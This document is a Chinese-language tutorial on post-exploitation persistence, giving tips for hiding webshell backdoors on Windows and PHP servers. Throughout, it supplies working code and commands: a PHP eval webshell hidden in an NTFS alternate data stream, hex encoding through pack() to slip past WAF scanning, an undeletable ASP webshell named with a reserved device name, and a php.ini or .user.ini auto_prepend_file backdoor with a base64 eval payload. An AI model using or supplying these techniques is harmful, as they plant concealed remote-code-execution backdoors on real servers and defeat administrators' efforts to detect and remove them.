0x01
维持权限,为后渗透阶段做准备,脚本方面有哪些有趣的Tips呢?结合系统一些特性,我们可以更好的隐蔽我们的后门。
0x02
创建系统隐藏文件
attrib +s +a +r +h
/ attrib +s +h
文件名
查看隐藏文件
0x03
利用ADS隐藏文件
NTFS交换数据流(Alternate Data Streams,简称ADS)是NTFS磁盘格式的一个特性,在NTFS文件系统下,每个文件都可以存在多个数据流。通俗的理解,就是其它文件可以“寄宿”在某个文件身上,而在资源管理器中却只能看到宿主文件,找不到寄宿文件。利用ADS数据流,我们可以做很多有趣的事情。
首先创建ADS隐藏文件
在命令行,echo一个数据流进去,比如index文件是正常文件。
echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg
这样就生成了一个不可见的 index.php:shell.jpg
可用 dir /r
命令来查看
修改与删除ADS隐藏文件
修改进入文件所在目录: notepad index.php:shell.jpg
删除index.php:shell.jpg
呢?直接删除index.php
。
如果你对NTFS文件宿主寄生虫感兴趣可以参考key表哥的这篇文章。
文件寄生——NTFS文件流实际应用
文件包含
我们生成了index.php:shell.jpg
,可以通过包含文件的方式来使用。
<?php include('index.php:shell.jpg');?>
还可以用上面学的隐藏include.php
免杀
但是躲不过waf扫描。
pack()函数
该函数用来将对应的参数打包成二进制字符串。
根据这个特性我们把 index.php:shell.jpg
hex编码来绕过waf。
<?php
$a="696E6465782E7068703A7368656C6C2E6A7067";
// index.php:shell.jpg hex编码
$b="a";
include(PACK('H*',$$b));
0x04
asp不死僵尸
主要是利用系统保留文件名创建无法删除的webshell来隐藏后门。
Windows 下不能够以下面这些字样来命名文件或文件夹:
aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9
生成
copy rootkit.asp \\.\D:\wwwroot\aux.test.asp
这类文件无法在图形界面删除,只能在命令行下删除:
del \\.\D:\wwwroot\aux.test.asp
0x05
phpinfo
查看是否开启环境变量 include_path
在C盘,创建 C:\php\pear目录,把木马文件丢上去。
再包含下就OK了,大多数waf并不会扫描这个路径,很容易被人忽略。
0x06
php.ini后门
将后门写入php.ini
allow_url_include=On
auto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+"
// base64 <?php @eval($_REQUEST[cmd]);?>
// 后门类型可自己修改。
完成后需要重新加载PHP.ini
使用死循环
<?php while(true){} ?>
任意PHP页面都可以用菜刀连接。
也可以直接使用.user.ini
简单来说,它和 php.ini 功能一样,但是是高度自定义,程序执行时会先寻找当前目录下是否存在 .user.ini 文件,如果没有会继续向根目录寻找,直到配置目录下的 php.ini。
auto_prepend_file = 1.txt
user_ini.cache_ttl = 10 //设置加载时间为10s 不需要重启apache时间一到自动加载。
Liunx
Windows与Linux两者在这方面应用是不同的,如果你想了解在Linux环境下php.ini的特性的更多特性,或者技巧可以参考这篇文章。
巧用 php.ini 留后门维持权限(需要高权限)
0x07
php backdoor
也叫做PHP扩展后门,隐蔽性比webshell强度了。我们使用的是Micropoor大牛的php backdoor
How to install?
0x08
参考致谢
https://www.cnblogs.com/xiaozi/p/7610984.html
https://paper.tuisec.win/detail/e7e0e752a08c09c
https://www.t00ls.net/viewthread.php?tid=38906&highlight=php.ini
https://www.t00ls.net/viewthread.php?tid=35053&highlight=php%2B%E5%90%8E%E9%97%A8
https://www.t00ls.net/viewthread.php?tid=44911&highlight=php%2B%E5%90%8E%E9%97%A8